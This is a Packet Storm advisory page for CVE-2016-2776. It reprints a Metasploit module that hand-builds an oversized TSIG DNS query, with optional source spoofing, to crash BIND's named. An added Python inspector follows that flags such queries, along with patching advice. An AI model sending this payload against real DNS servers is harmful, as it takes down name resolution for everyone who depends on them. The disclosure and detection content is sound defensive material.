Packet Storm: Martin Rocha, Ezequiel Tavella, Alejandro Parodi, Infobyte Research Team, metasploit.com (PACKETSTORM:180551)
History: Aug 31, 2024 - 12:00 a.m.

BIND TSIG Query Denial of Service

2024-08-31 00:00:00
Martin Rocha, Ezequiel Tavella, Alejandro Parodi, Infobyte Research Team, metasploit.com
packetstormsecurity.com
27
Tags: dns, denial of service, query

CVSS2: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Authentication: NONE
  Confidentiality Impact: NONE
  Integrity Impact: NONE
  Availability Impact: COMPLETE

CVSS3: 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: NONE
  Integrity Impact: NONE
  Availability Impact: HIGH

AI Score: 7.1
Confidence: Low

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Capture
  include Msf::Auxiliary::UDPScanner
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'BIND TSIG Query Denial of Service',
      'Description' => %q{
        A defect in the rendering of messages into packets can cause named to
        exit with an assertion failure in buffer.c while constructing a response
        to a query that meets certain criteria.

        This assertion can be triggered even if the apparent source address
        isn't allowed to make queries.
      },
      # Research and Original PoC - msf module author
      'Author' => [
        'Martin Rocha',
        'Ezequiel Tavella',
        'Alejandro Parodi',
        'Infobyte Research Team'
      ],
      'References' => [
        ['CVE', '2016-2776'],
        ['URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html']
      ],
      'DisclosureDate' => '2016-09-27',
      'License' => MSF_LICENSE,
      'DefaultOptions' => { 'ScannerRecvWindow' => 0 }
    ))

    register_options([
      Opt::RPORT(53),
      OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])
    ])

    deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')
  end

  def scan_host(ip)
    if datastore['SRC_ADDR']
      scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])
    else
      print_status("Sending packet to #{ip}")
      scanner_send(payload, ip, rport)
    end
  end

  def payload
    query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65
    query << "\x00\x00" # Flags: 0x0000 Standard query
    query << "\x00\x01" # Questions: 1
    query << "\x00\x00" # Answer RRs: 0
    query << "\x00\x00" # Authority RRs: 0
    query << "\x00\x01" # Additional RRs: 1

    # Domain Name
    query << get_domain # Random DNS Name
    query << "\x00" # [End of name]
    query << "\x00\x01" # Type: A (Host Address) (1)
    query << "\x00\x01" # Class: IN (0x0001)

    # Additional records. Name
    query << ("\x3f" + Rex::Text.rand_text_alphanumeric(63)) * 3 # 192 bytes
    query << "\x3d" + Rex::Text.rand_text_alphanumeric(61)
    query << "\x00"

    query << "\x00\xfa" # Type: TSIG (Transaction Signature) (250)
    query << "\x00\xff" # Class: ANY (0x00ff)
    query << "\x00\x00\x00\x00" # Time to live: 0
    query << "\x00\xfc" # Data length: 252

    # Algorithm Name
    query << ("\x3f" + Rex::Text.rand_text_alphanumeric(63)) * 3 # Random 192 bytes
    query << "\x1A" + Rex::Text.rand_text_alphanumeric(26) # Random 26 bytes
    query << "\x00"

    # Rest of TSIG
    query << "\x00\x00" + Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART
    query << "\x01\x2c" # Fudge: 300
    query << "\x00\x10" # MAC Size: 16
    query << Rex::Text.rand_text_alphanumeric(16) # MAC
    query << "\x8f\x65" # Original Id: 36709
    query << "\x00\x00" # Error: No error (0)
    query << "\x00\x00" # Other len: 0
  end

  def get_domain
    domain = "\x06" + Rex::Text.rand_text_alphanumeric(6)
    org = "\x03" + Rex::Text.rand_text_alphanumeric(3)
    domain + org
  end
end
```
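The module above hand-assembles a standard query whose additional section carries a TSIG pseudo-record with maximal-length key and algorithm names, bringing the whole message to 545 bytes. As an added example written for this page (it is not part of the Packet Storm module, of Metasploit, or of BIND), the following stdlib-only Python inspector parses a DNS message with a compression-aware name parser and tags TSIG-bearing queries that show this shape: an algorithm name outside the RFC 2845/4635 set, a TSIG that is not the last record, a wrong class or TTL, or a message size near or beyond the classic 512-byte UDP limit. The NEAR_LIMIT threshold, the finding tags, and the two constructed samples (BENIGN and OVERSIZED) are assumptions of the example; the sample builder mirrors the layout of the module's payload with fixed bytes in place of the random ones.

```python
# Added example (not part of the Packet Storm module or of BIND): a stdlib-only
# inspector for DNS queries carrying TSIG. Tags and NEAR_LIMIT are this example's own.
import struct

DNS_TYPE_TSIG = 250      # TSIG pseudo-record type (RFC 2845)
DNS_CLASS_ANY = 255
NEAR_LIMIT = 480         # heuristic: close to the classic 512-byte DNS/UDP limit
KNOWN_ALGORITHMS = {     # RFC 2845 / RFC 4635 algorithm names, lower-cased
    b"hmac-md5.sig-alg.reg.int", b"hmac-sha1", b"hmac-sha224",
    b"hmac-sha256", b"hmac-sha384", b"hmac-sha512",
}

def _need(data, offset, n):
    if offset + n > len(data): raise ValueError("truncated message")

def parse_name(data, offset, max_hops=16):
    """Parse a name at offset -> (labels, offset after it); hop-limited for pointer loops."""
    labels, end, hops = [], None, 0
    while True:
        _need(data, offset, 1)
        length = data[offset]
        if length == 0:
            return labels, (end if end is not None else offset + 1)
        if length & 0xC0 == 0xC0:           # two-byte compression pointer (RFC 1035 4.1.4)
            _need(data, offset, 2)
            if end is None:
                end = offset + 2            # resume here after following the pointer
            hops += 1
            if hops > max_hops: raise ValueError("compression pointer loop")
            offset = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            continue
        if length > 63: raise ValueError("label longer than 63 octets")
        _need(data, offset + 1, length)
        labels.append(data[offset + 1:offset + 1 + length])
        offset += 1 + length

def parse_message(data):
    """Parse the header, questions and every resource record of a DNS message."""
    _need(data, 0, 12)
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", data[:12])
    offset, questions, records = 12, [], []
    for _ in range(qd):
        labels, offset = parse_name(data, offset)
        _need(data, offset, 4)
        qtype, qclass = struct.unpack("!HH", data[offset:offset + 4])
        offset += 4
        questions.append((labels, qtype, qclass))
    for _ in range(an + ns + ar):
        labels, offset = parse_name(data, offset)
        _need(data, offset, 10)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        _need(data, offset, rdlen)
        records.append((labels, rtype, rclass, ttl, data[offset:offset + rdlen]))
        offset += rdlen
    return {"id": txid, "flags": flags, "questions": questions, "records": records,
            "additional": records[an + ns:], "size": len(data)}

def assess_tsig_query(data):
    """Return sorted finding tags for a TSIG-bearing query; [] when nothing looks odd."""
    msg = parse_message(data)
    if msg["flags"] & 0x8000:               # QR set: a response, not a query
        return []
    tsigs = [r for r in msg["additional"] if r[1] == DNS_TYPE_TSIG]
    if not tsigs:
        return []
    findings = set()
    if msg["records"][-1][1] != DNS_TYPE_TSIG:
        findings.add("tsig-not-last-record")    # RFC 2845 requires TSIG to be last
    _, _, rclass, ttl, rdata = tsigs[-1]
    if rclass != DNS_CLASS_ANY or ttl != 0:
        findings.add("tsig-bad-class-or-ttl")
    alg_labels, _ = parse_name(rdata, 0)         # RDATA begins with the algorithm name
    if b".".join(alg_labels).lower() not in KNOWN_ALGORITHMS:
        findings.add("tsig-unknown-algorithm")
    if msg["size"] >= NEAR_LIMIT:
        # A signed query this large leaves little room for a signed UDP reply; the module's is 545 bytes.
        findings.add("tsig-query-near-udp-limit")
    return sorted(findings)

def encode_name(labels):
    return b"".join(bytes([len(label)]) + label for label in labels) + b"\x00"

def build_tsig_query(qname, key_name, algorithm, mac=b"\x00" * 16, txid=0x1234):
    """Constructed test input: one A/IN question plus one TSIG additional record."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 1)
    question = encode_name(qname) + struct.pack("!HH", 1, 1)
    rdata = (encode_name(algorithm) + b"\x00" * 6                  # time signed (48 bits)
             + struct.pack("!HH", 300, len(mac)) + mac             # fudge, MAC size, MAC
             + struct.pack("!HHH", txid, 0, 0))                    # original id, error, other len
    tsig = encode_name(key_name) + struct.pack("!HHIH", DNS_TYPE_TSIG, DNS_CLASS_ANY, 0, len(rdata)) + rdata
    return header + question + tsig

# Constructed samples: a normally signed query, and one shaped like the module's payload
# (three 63-octet labels plus a short one in both names, 16-byte MAC, fudge 300).
BENIGN = build_tsig_query([b"example", b"com"], [b"tsig-key", b"example", b"com"], [b"hmac-sha256"])
OVERSIZED = build_tsig_query([b"abcdef", b"org"], [b"A" * 63] * 3 + [b"B" * 61], [b"C" * 63] * 3 + [b"D" * 26])
```

Feed `assess_tsig_query` the UDP payload of each inbound query captured in front of a resolver; `BENIGN` yields no findings, while `OVERSIZED` (545 bytes, like the module's packet) is tagged both `tsig-query-near-udp-limit` and `tsig-unknown-algorithm`. That pair arriving from sources that hold no configured TSIG key is the pattern worth alerting on; the fix itself is running a version of named that addresses CVE-2016-2776, since the module notes the assertion fires even for addresses not allowed to query.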
